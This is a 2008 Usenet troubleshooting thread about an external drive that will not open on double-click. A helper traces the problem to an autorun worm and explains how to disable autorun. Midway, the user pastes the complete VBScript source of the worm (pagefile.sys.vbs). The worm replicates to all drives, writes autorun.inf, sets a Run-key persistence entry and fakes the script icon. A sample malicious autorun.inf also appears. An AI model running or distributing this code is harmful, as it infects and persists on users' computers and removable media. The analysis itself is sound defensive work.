Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Unable to double click on external Drive

13 views
Skip to first unread message

AJS

unread,
Aug 18, 2008, 9:10:46 PM8/18/08
to
Hi, I am suddenly unable to open an external drive by double clicking its
drive letter. I have to right click and click on open.
Any suggestions why that is?
Thanks


JF

unread,
Aug 18, 2008, 10:47:55 PM8/18/08
to
*Bonjour AJS * !
<news:eCctshZA...@TK2MSFTNGP05.phx.gbl>

Do you see any Autorun.inf file on this Volume ?
Can be Hide ans System, see Folders Options.

Or in a Console (Start>Run>cmd) :

attrib -h -s -r F:\autorun.inf

(assuming your external drive is F)

Rename Autorun.inf to Autorun.txt and copy the text here.
Thanks.

Example of a bad Autorun.inf ==>

[AutoRun]
open=xn1i9x.com
shell\open\Command=xn1i9x.com
shell\explore\Command=xn1i9x.com

More informations :
http://www.google.com/search?q=xn1i9x.com

Protections :

Tell the system to not read Autorun.inf
http://www.google.com/search?q=IniFileMapping+Autorun.inf

Avoid using a PC with administrator privileges.
So autorun.inf is ignored.

Check every drive for virus and so.

To protect a volume, you can create a FOLDER named autorun.inf
Make it Hide, System ans ReadOnly :
F:
attrib +h +s +r autorun.inf

Then it will be difficult to write a new FILE with that name.

--
Regards, Jean-François


AJS

unread,
Aug 18, 2008, 11:28:21 PM8/18/08
to
Thanks, but there is no autorun.inf file


"JF" <JF@-> wrote in message news:uUVc8XaA...@TK2MSFTNGP05.phx.gbl...

JF

unread,
Aug 19, 2008, 12:02:58 AM8/19/08
to
*Bonjour AJS * !
<news:#c7NluaA...@TK2MSFTNGP05.phx.gbl>

> Thanks, but there is no autorun.inf file

Start>Run>regsvr32 /i shell32

Check these (by default) Values which must be equal to "none"
HKCR\Directory\shell (by default)=none
HKCR\Drive\shell (by default)=none

--
Regards, Jean-François


AJS

unread,
Aug 19, 2008, 3:32:29 AM8/19/08
to
Thanks,

Found it.
This is what is says in notepad:
[autorun]
shellexecute=wscript.exe pagefile.sys.vbs


"JF" <JF@-> wrote in message news:exxo4BbA...@TK2MSFTNGP02.phx.gbl...

JF

unread,
Aug 19, 2008, 6:44:25 AM8/19/08
to
*Bonjour AJS * !
<news:eE#XJ3cAJ...@TK2MSFTNGP04.phx.gbl>

> Thanks,
> Found it.
> This is what is says in notepad:
> [autorun]
> shellexecute=wscript.exe pagefile.sys.vbs

Very well, thank you for the feed-back.
Wscript.exe is a command to execute scripts.VBS
c:\PageFile.sys is your paging file.
But pagefile.sys.vbs is a script which attend to be seen as a legal
system file (ask for every extension in Folders Options).

Did you find this pagefile.sys.vbs somewhere on your drives ?
It should be on F:\ or C:\ or
c:\windows or
c:\windows\system32

A script is some text.
You can rename it as pagefile.sys.vbs.txt
And copy here the text. Thanks !

--
Regards, Jean-François


AJS

unread,
Aug 19, 2008, 3:11:22 PM8/19/08
to
Thanks again for your prompt reply.
Here is the text of "pagefile.sys.vbs"

'kuciapka tu byl
on error resume next
dim ksource,winpath,kflash,kfs,kmf,katrib,kuc,rgpath,nt,check,sado
katrib="[autorun]"&vbcrlf&"shellexecute=wscript.exe pagefile.sys.vbs"
set kfs=createobject("Scripting.FileSystemObject")
set kmf=kfs.getfile(Wscript.ScriptFullname)
dim text,size
size=kmf.size
check=kmf.drive.drivetype
set text=kmf.openastextstream(1,-2)
do while not text.atendofstream
ksource=ksource&text.readline
ksource=ksource&vbcrlf
loop
do
Set winpath=kfs.getspecialfolder(0)
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(winpath&"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(winpath&"\pagefile.sys.vbs")
kuc.attributes=39
for each kflash in kfs.drives
If (kflash.drivetype=1 or kflash.drivetype=2) and kflash.path <> "A:" then
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\pagefile.sys.vbs",2,true)
kuc.write ksource
kuc.close
set kuc=kfs.getfile(kflash.path&"\pagefile.sys.vbs")
kuc.attributes=39
set kuc=kfs.getfile(kflash.path&"\autorun.inf")
kuc.attributes=32
set kuc=kfs.createtextfile(kflash.path &"\autorun.inf",2,true)
kuc.write katrib
kuc.close
set kuc=kfs.getfile(kflash.path &"\autorun.inf")
kuc.attributes=39
end if
next
set rgpath=createobject("WScript.Shell")
rgpath.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbs"
rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"
if check <> 1 then
Wscript.sleep 200000
end if
loop while check<>1
set sado=createobject("Wscript.shell")
sado.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

"JF" <JF@-> wrote in message news:%238bVNie...@TK2MSFTNGP06.phx.gbl...

AJS

unread,
Aug 19, 2008, 3:15:39 PM8/19/08
to
Sorry, forgot to mention that I found these two files:

1. C:\pagefile.sys.vbs
2. C:\pagefile.sys


"JF" <JF@-> wrote in message news:%238bVNie...@TK2MSFTNGP06.phx.gbl...

JF

unread,
Aug 20, 2008, 1:29:11 AM8/20/08
to
*Bonjour AJS * !
<news:OyvR5$iAJHA...@TK2MSFTNGP02.phx.gbl>

> Sorry, forgot to mention that I found these two files:

> 1. C:\pagefile.sys.vbs
> 2. C:\pagefile.sys

Thank you, this is very interesting.

1 = malware
http://www.google.com/search?q=pagefile.sys.vbs

2 = legal system file


For your information my anti-virus screamed
and your message appear now (for me) with this title :

Sujet : [avast! - INFECTED] Re: Unable to double click on external
Drive

I cannot find for now what is the instruction which alert Avast.
Somebody knows ?

Question :
Do you have any anti-virus ?
http://www.google.com/search?q=Avast!+VS+Antivir

--
Regards, Jean-François


JF

unread,
Aug 20, 2008, 7:02:12 AM8/20/08
to
> For your information my anti-virus screamed
> and your message appear now (for me) with this title :

> Sujet : [avast! - INFECTED] Re: Unable to double click on external Drive

> I cannot find for now what is the instruction which alert Avast.

This part of code is the cause of the alert :

rgpath.regwrite
"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MSRegInfo",winpath&"\pagefile.sys.vbsANTIVIRUSALERT"


rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"

I added ANTIVIRUSALERT to be quiet with Avast.

winpath represent Windows folder.
The key Run\MSRegInfo does not exist normaly, and is created by the
script. So it is a good idea to google it
http://www.google.com/search?q=Run%5CMSRegInfo


This is the 2 commands together which wake up Avast
... Run\MSRegInfo",winpath&"\pagefile.sys. vbs"
... rgpath.regwrite "HKCR\vbsfile\DefaultIcon","shell32.dll,2"

This second command give a false icon to the VBS files so they are seen
as innocent text files.

--
Regards, Jean-François


Plato

unread,
Aug 20, 2008, 8:25:01 PM8/20/08
to
AJS wrote:
>
> Hi, I am suddenly unable to open an external drive by double clicking its
> drive letter. I have to right click and click on open.

Could be as simple as a bad mouse.

--
http://www.bootdisk.com/

AJS

unread,
Aug 22, 2008, 2:45:39 PM8/22/08
to
Thanks,
I now am able to double click.
Good work!

"JF" <JF@-> wrote in message news:exxo4BbA...@TK2MSFTNGP02.phx.gbl...

JF

unread,
Aug 22, 2008, 10:49:43 PM8/22/08
to
*Bonjour AJS * !
<news:ug#oIdIBJ...@TK2MSFTNGP03.phx.gbl>

>>>> Do you see any Autorun.inf file on this Volume ?
>>>> Can be Hide ans System, see Folders Options.

>>> Thanks, but there is no autorun.inf file

>> Start>Run>regsvr32 /i shell32
>> Check these (by default) Values which must be equal to "none"
>> HKCR\Directory\shell (by default)=none
>> HKCR\Drive\shell (by default)=none

> Thanks,


> I now am able to double click.
> Good work!

Thank you again for the feed-back.
Bonne continuation !

--
Regards, Jean-François


0 new messages